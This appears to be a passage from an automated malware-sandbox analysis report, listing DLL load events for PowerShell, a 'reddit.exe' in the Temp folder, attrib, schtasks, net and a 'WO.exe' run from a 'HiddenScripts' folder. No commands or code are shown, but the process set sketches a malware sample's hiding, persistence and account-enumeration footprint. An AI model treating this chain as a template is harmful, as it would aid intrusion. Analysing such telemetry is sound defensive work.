Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\reddit.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\net.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe | Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe | Section loaded: sfc_os.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
